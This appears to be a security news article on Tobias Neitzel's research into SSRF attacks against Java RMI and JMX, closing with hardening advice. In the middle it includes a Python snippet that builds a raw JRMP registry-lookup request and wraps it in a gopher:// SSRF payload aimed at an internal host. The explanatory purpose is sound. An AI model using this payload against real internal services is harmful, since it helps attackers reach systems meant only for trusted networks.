Trust boundaries breached by security shortcomings
Java RMI services can be attacked through server-side request forgery (SSRF) attacks, according to a detailed analysis of the problem by security researcher Tobias Neitzel.
Java RMI (Remote Method Invocation) is an object-oriented Remote Procedure Call (RPC) mechanism that ships with the standard Java runtime. Developers use it to expose the methods of Java objects to callers on other hosts.
For communication, Java RMI relies on serialized Java objects, a mechanism that attackers have repeatedly been able to abuse through deserialization attacks, even though the technology has been progressively hardened over recent years, Neitzel found.
In a detailed technical blog post, the researcher explains how default RMI components can be attacked with varying outcomes, up to and including remote code execution, Neitzel told The Daily Swig.
SSRF attacks in general allow an attacker to trick a server-side application into making requests to a destination of the attacker's choosing, most often an HTTP request to an internal host that is not reachable from outside, a behaviour that opens the door to all manner of malfeasance.
“As with all SSRF techniques, the major problem is that attackers may be able to attack RMI services that are supposed to only be accessed from trusted networks,” Neitzel explained.
“Securing RMI properly is not that intuitive and there is a lot of hidden attack surface. Instead of configuring it properly, administrators often take the easy route and only allow access from trusted networks or clients.”
Neitzel’s research demonstrated that an external attacker “may be able to exploit insecurely configured internal services by utilizing an SSRF vulnerability in an external service”, among other techniques.
The most widely deployed RMI-based service is JMX (Java Management Extensions). Neitzel showed that a backend JMX service can be compromised via SSRF, but only if the vulnerable front-end system both accepts arbitrary bytes and returns the backend’s binary responses to the attacker: reaching JMX takes several round trips, and the later requests depend on details read from the earlier replies.
Similarly, SSRF-based attacks on default RMI components, such as the RMI registry, are also possible, and these require only that the system allows arbitrary bytes to be sent to the backend service: default components such as the registry listen on fixed, well-known object identifiers, so no information from a response is needed to address them.
“Java RMI is a binary protocol and requires all sorts of different data types during communication,” Neitzel said.
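Neitzel’s point about arbitrary bytes is easiest to see on the wire. The following Python, added here as an illustration and not taken from the article or from Neitzel’s blog, builds the raw JRMP bytes of a single-op `Registry.lookup("jmxrmi")` call, the kind of request an attacker would have to push through an SSRF gadget to even talk to a backend registry. The protocol constants come from the JRMP specification and the OpenJDK registry stub; the host, port and the gopher:// encoding are assumptions about a hypothetical curl-style gadget that follows gopher URLs, which is a common way such gadgets are made to emit raw TCP bytes and is not something the article describes.

```python
"""
Build the raw JRMP (Java RMI wire protocol) bytes of a single-op
Registry.lookup(name) call and show what an SSRF gadget must be able to
transmit for them to reach a backend RMI registry.

Added example, not code from the article or from Tobias Neitzel. Protocol
constants follow the JRMP specification and the OpenJDK RegistryImpl_Stub;
the gopher:// encoding assumes a hypothetical curl-style gadget.
"""
import struct
from urllib.parse import quote

# JRMP stream header: magic "JRMI", version 2, SingleOpProtocol (0x4c).
# In single-op mode the server sends no ProtocolAck, so a fire-and-forget
# gadget can deliver a complete call in a single write.
JRMI_MAGIC = b"JRMI"
JRMI_VERSION = 0x0002
SINGLE_OP_PROTOCOL = 0x4C
MSG_CALL = 0x50

# Java serialization stream header and the two type codes used below.
SER_MAGIC = 0xACED
SER_VERSION = 0x0005
TC_BLOCKDATA = 0x77
TC_STRING = 0x74

# The registry sits behind the well-known ObjID 0 with an all-zero UID,
# which is why a registry call needs no prior round trip to discover it.
REGISTRY_OBJNUM = 0
# RegistryImpl_Stub: operation number 2 is lookup(String); interfaceHash as in OpenJDK.
REGISTRY_LOOKUP_OPNUM = 2
REGISTRY_INTERFACE_HASH = 4905912898345647071


def jrmp_header() -> bytes:
    return JRMI_MAGIC + struct.pack(">HB", JRMI_VERSION, SINGLE_OP_PROTOCOL)


def java_utf(s: str) -> bytes:
    """TC_STRING: type code, 2-byte length, UTF-8 bytes (ASCII names only here)."""
    data = s.encode("utf-8")
    if len(data) > 0xFFFF:
        raise ValueError("string too long for TC_STRING")
    return struct.pack(">BH", TC_STRING, len(data)) + data


def registry_lookup_call(name: str) -> bytes:
    """Call message: 0x50, then a serialization stream holding
    (ObjID, opnum, hash) as raw block data followed by the String argument."""
    # ObjID.write(): objNum (long), UID.unique (int), UID.time (long), UID.count (short)
    objid = struct.pack(">qiqh", REGISTRY_OBJNUM, 0, 0, 0)
    op = struct.pack(">iq", REGISTRY_LOOKUP_OPNUM, REGISTRY_INTERFACE_HASH)
    primitives = objid + op  # 22 + 12 = 34 bytes, fits one short block
    stream = struct.pack(">HH", SER_MAGIC, SER_VERSION)
    stream += struct.pack(">BB", TC_BLOCKDATA, len(primitives)) + primitives
    stream += java_utf(name)
    return bytes([MSG_CALL]) + stream


def lookup_request(name: str) -> bytes:
    """Complete bytes a client writes to the socket for one lookup(name)."""
    return jrmp_header() + registry_lookup_call(name)


def needs_arbitrary_bytes(payload: bytes) -> bool:
    """True if the payload contains NUL or other control bytes, i.e. it cannot be
    smuggled through a gadget that only ever emits well-formed HTTP text."""
    return any(b < 0x20 or b == 0x7F for b in payload)


def to_gopher_url(host: str, port: int, payload: bytes) -> str:
    """Encode the bytes as gopher://host:port/_<percent-encoded bytes>.
    Assumed gadget behaviour: the leading '_' is the gopher item type and is
    dropped; the rest is written to the socket verbatim (curl-style clients
    append CRLF, which the registry reads as junk after the call is handled)."""
    return f"gopher://{host}:{port}/_" + quote(payload, safe="")


if __name__ == "__main__":
    req = lookup_request("jmxrmi")
    print(req.hex(" "))
    print("HTTP-only gadget suffices:", not needs_arbitrary_bytes(req))
    # Constructed internal target, not a real host.
    print(to_gopher_url("10.0.0.5", 1099, req))
```

The request begins with `JRMI\x00\x02L` and is full of NUL bytes, so a gadget that can only form HTTP requests cannot deliver it; only one that forwards arbitrary bytes can, which is the first condition Neitzel names. Because the registry’s object identifier is fixed, this particular call can be sent blind, whereas addressing the JMX server behind the registry would require reading its identifier out of the response.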
Susceptibility to SSRF attacks is symptomatic of wider insecurities that are all too commonplace.
“Services may expose dangerous methods, do not implement deserialization filters, or are outdated and contain known vulnerabilities (e.g. remote class loading),” Neitzel told The Daily Swig.
The German researcher’s blog post closes with a list of hardening measures for RMI services.
These include TLS-protected communication for all RMI endpoints, deserialization filters (the ObjectInputFilter mechanism introduced by JEP 290), and stronger authentication controls.